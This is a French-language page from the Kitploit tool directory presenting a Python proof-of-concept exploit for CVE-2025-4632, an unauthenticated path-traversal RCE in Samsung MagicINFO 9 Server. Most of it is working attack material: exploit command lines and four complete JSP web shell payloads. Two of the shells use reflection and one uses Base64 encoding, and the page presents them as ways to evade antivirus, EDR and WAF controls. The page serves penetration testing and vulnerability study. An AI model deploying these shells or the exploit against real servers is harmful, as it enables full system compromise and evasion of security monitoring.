Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4632_POC — Ce dépôt contient un script de réplication en Python pour CVE-2025-4632, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans Samsung MagicINFO 9 Server (versions antérieures à 21.1052). | Kitploit
Outils/GitHubGitHub/digitalsurgn/cve-2025-4632_poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHubdigitalsurgn/cve-2025-4632_poc

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-4632_POC

Ce dépôt contient un script de réplication en Python pour CVE-2025-4632, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans Samsung MagicINFO 9 Server (versions antérieures à 21.1052).

Voir le dépôt
11il y a 3 moisPas encore vérifié

Exploit du serveur Samsung MagicINFO 9 (CVE-2025-4632)

Ce dépôt contient un script de réplication en Python pour CVE-2025-4632, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans le serveur Samsung MagicINFO 9 (versions antérieures à 21.1052).

La vulnérabilité existe en raison d'une limitation incorrecte d'un nom de chemin dans la servlet SWUpdateFileUploader. En utilisant un parcours de répertoire (../../), un attaquant non authentifié peut écrire des fichiers arbitraires avec les privilèges SYSTEM, conduisant à un compromission totale du serveur.

Crédits et remerciements

  • Découverte originale et auteur du modèle : s4e-io (de la communauté ProjectDiscovery Nuclei (http/cves/2025/CVE-2025-4632.yaml)).
  • Méthodologie : Ce script est une implémentation programmatique directe de la logique définie dans le modèle Nuclei CVE-2025-4632.

Fonctionnement

Le script automatise le processus de génération d'une demande de mise à jour d'appareil d'apparence légitime. Il exploite le paramètre fileName en injectant des séquences de traversée de répertoire pour sortir du répertoire de téléversement prévu et écrire un fichier directement dans la racine web (/MagicInfo/).

Le script effectue deux étapes :

  1. Requête POST : Envoie la charge utile à /MagicInfo/servlet/SWUpdateFileUploader avec le chemin de traversée.
  2. Requête GET (Vérification) : Tente automatiquement d'accéder au fichier téléversé à l'adresse /MagicInfo/<filename> pour confirmer le succès de l'exploitation.

Utilisation

root@kitploit:~
python exploit_magicinfo.py -t <TARGET_URL> -f <FILENAME> -d <PAYLOAD_DATA>

Arguments :

  • -t / --target : L'URL de base de la cible (par exemple, http://192.168.1.100:7001).
  • -f / --filename : Le nom du fichier à créer (par exemple, shell.jsp).
  • -d / --data : Le contenu brut à écrire dans le fichier.

Exemples de charges utiles pour les tests d'intrusion

Les charges utiles suivantes ont été testées avec succès lors d'activités d'évaluation. Elles sont conçues pour prouver l'impact tout en contournant les contrôles de sécurité des points de terminaison.

1. Preuve de concept bénigne (Vérification d'impact)

Utilisée pour confirmer en toute sécurité l'exécution de JSP sans déclencher l'antivirus ou l'EDR.

root@kitploit:~
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f poc.jsp -d '<% out.println("JSP Execution Confirmed. System time: " + new java.util.Date()); %>'

Accès : http://<target>:7001/MagicInfo/poc.jsp

2. Shell d'exécution de commandes standard

Un shell web JSP standard. Remarque : Il peut être détecté et mis en quarantaine par les solutions AV/EDR modernes, ce qui entraîne une 404 Not Found lors de la vérification.

root@kitploit:~
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f cmd.jsp -d '<%@ page import="java.io.*" %><% String c = request.getParameter("c"); if (c != null) { Process p = Runtime.getRuntime().exec("cmd.exe /c " + c); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String l; out.print("<pre>"); while ((l = in.readLine()) != null) { out.println(l); } out.print("</pre>"); } %>'

Accès : http://<target>:7001/MagicInfo/cmd.jsp?c=whoami

3. Exécution de commandes obfusquée (Contournement EDR/AV)

Utilisée lorsque le shell standard est bloqué. Cette charge utile utilise la réflexion Java pour masquer la signature Runtime.getRuntime().exec à l'analyse statique.

root@kitploit:~
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f bypass.jsp -d '<%@ page import="java.io.*" %><% String s1 = "Run"; String s2 = "time"; String s3 = "ex"; String s4 = "ec"; Object rt = Class.forName("java.lang."+s1+s2).getMethod("get"+s1+s2).invoke(null); String c = request.getParameter("c"); if(c!=null){Process p = (Process)rt.getClass().getMethod(s3+s4, String.class).invoke(rt, "cmd.exe /c " + c); java.util.Scanner s = new java.util.Scanner(p.getInputStream()).useDelimiter("\\A"); out.print("<pre>"+(s.hasNext()?s.next():"")+"</pre>");} %>'

Accès : http://<target>:7001/MagicInfo/bypass.jsp?c=whoami /all

4. Shell obfusqué avancé en Base64 (Contournement WAF et analyse d'URL)

Hautement recommandé pour les commandes complexes : Si vous rencontrez des erreurs 400 Bad Request lors de l'exécution de commandes contenant des espaces, des barres obliques inverses ou des caractères spéciaux (par exemple, dir c:\), la validation stricte de l'URI du serveur ou un WAF bloque la requête.

Cette charge utile avancée attend que la commande soit encodée en Base64 dans l'URL. Elle la décode côté serveur avant l'exécution, contournant complètement le filtrage d'URL et masquant la commande aux moniteurs réseau.

root@kitploit:~
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f b64.jsp -d '<%@ page import="java.io.*,java.util.Base64" %><% String s1="Run";String s2="time";String s3="ex";String s4="ec";Object rt=Class.forName("java.lang."+s1+s2).getMethod("get"+s1+s2).invoke(null);String c=request.getParameter("c");if(c!=null){byte[] decodedBytes = Base64.getDecoder().decode(c);String decodedCmd = new String(decodedBytes);Process p=(Process)rt.getClass().getMethod(s3+s4,String.class).invoke(rt,"cmd.exe /c "+decodedCmd);java.util.Scanner s=new java.util.Scanner(p.getInputStream()).useDelimiter("\\A");out.print("<pre>"+(s.hasNext()?s.next():"")+"</pre>");} %>'

Exemples d'utilisation : Encodez votre commande en Base64 localement (par exemple, echo -n "dir c:\" | base64), puis transmettez-la au paramètre c.

  • whoami -> d2hvYW1p
    • Accès : http://<target>:7001/MagicInfo/b64.jsp?c=d2hvYW1p
  • tasklist /svc -> dGFza2xpc3QgL3N2Yw==
    • Accès : http://<target>:7001/MagicInfo/b64.jsp?c=dGFza2xpc3QgL3N2Yw==
  • dir c:\ -> ZGlyIGM6XA==
    • Accès : http://<target>:7001/MagicInfo/b64.jsp?c=ZGlyIGM6XA==

Avertissement : Ce script est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés.

Télécharger l’outil